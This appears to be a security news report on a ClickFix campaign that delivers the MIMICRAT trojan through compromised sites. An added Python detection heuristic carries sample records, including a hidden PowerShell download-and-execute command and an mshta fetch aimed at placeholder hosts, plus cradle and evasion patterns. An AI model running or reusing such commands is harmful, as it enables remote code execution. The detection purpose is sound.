ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware
Source: The Hacker News

Overview
Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (also known as AstarionRAT).
Elastic Security Labs described the operation as highly sophisticated, noting that compromised sites across multiple industries and geographies serve as the delivery infrastructure. A multi‑stage PowerShell chain performs ETW and AMSI bypasses before dropping a Lua‑scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using traffic patterns that resemble legitimate web‑analytics requests.
MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post‑exploitation capabilities. The campaign was discovered earlier this month and appears to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress, which uses the Matanbuchus 3.0 loader as a conduit for the same RAT. The ultimate goal is suspected to be ransomware deployment or data exfiltration.
Infection Chain
- Initial compromise – The entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached.
- Malicious JavaScript injection – Injected script loads an externally hosted PHP payload.
- Fake Cloudflare verification – The PHP script displays a counterfeit verification page, prompting the victim to copy‑paste a command into the Windows Run dialog.
- PowerShell execution – The command runs PowerShell, which contacts a C2 server to fetch a second‑stage PowerShell script.
- ETW and AMSI bypass – The second‑stage script patches Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI) so that later stages are neither logged nor scanned.
- Lua‑based loader – After bypasses, a Lua script is dropped. This script decrypts and executes in‑memory shellcode.
- MIMICRAT deployment – The shellcode delivers the MIMICRAT implant.
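As an added example (not code from the article, Elastic, or the campaign), the following heuristic flags the shape of the Run‑dialog step above: a script host started from explorer.exe whose command line also carries a download cradle. The Sysmon‑style record fields and the .invalid hostnames are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation records for this example, not
# telemetry from the campaign. Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iwr https://lure.invalid/v | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://lure.invalid/p"},
    {"parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]

# Script hosts that a pasted Run-dialog command can start directly.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Remote-fetch ("download cradle") markers: the first stage reaches out to a
# C2 server for the second-stage script.
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|webclient)\b|https?://", re.I)
# Flags that hide the console or skip profile and execution-policy checks.
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(nc(odedcommand)?)?\b|-ep\s+bypass", re.I)
R_HOST, R_CRADLE, R_EVASION = "explorer.exe -> script host", "download cradle", "evasion flags"

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the heuristic reasons an event resembles a ClickFix launch."""
    reasons = []
    if basename(event["parent"]) == "explorer.exe" and basename(event["image"]) in SCRIPT_HOSTS:
        reasons.append(R_HOST)
    if CRADLE.search(event["cmdline"]):
        reasons.append(R_CRADLE)
    if EVASION.search(event["cmdline"]):
        reasons.append(R_EVASION)
    return reasons

def find_clickfix_candidates(events):
    """Flag only events pairing a shell-launched script host with a cradle;
    either signal alone is common in benign administration."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if R_HOST in reasons and R_CRADLE in reasons:
            hits.append((i, reasons))
    return hits
```

The scheduled inventory script in the third record is deliberately left unflagged: PowerShell launched by a management agent without a cradle is routine, and the pairing rule is what keeps the alert volume usable.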
Technical Details
- Communication – MIMICRAT uses HTTPS for C2 traffic, blending with legitimate web‑analytics patterns on port 443.
- Capabilities – The RAT accepts roughly two dozen commands, enabling:
  - Process and file‑system control
  - Interactive shell access
  - Token manipulation and impersonation
  - Shellcode injection
  - SOCKS5 proxy tunneling
- Localization – The lure content is dynamically localized into 17 languages based on the victim’s browser settings, broadening its reach.
- Observed victims – Infections have been reported in a U.S. university and among Chinese‑speaking users discussed in public forums, indicating opportunistic targeting across geographies.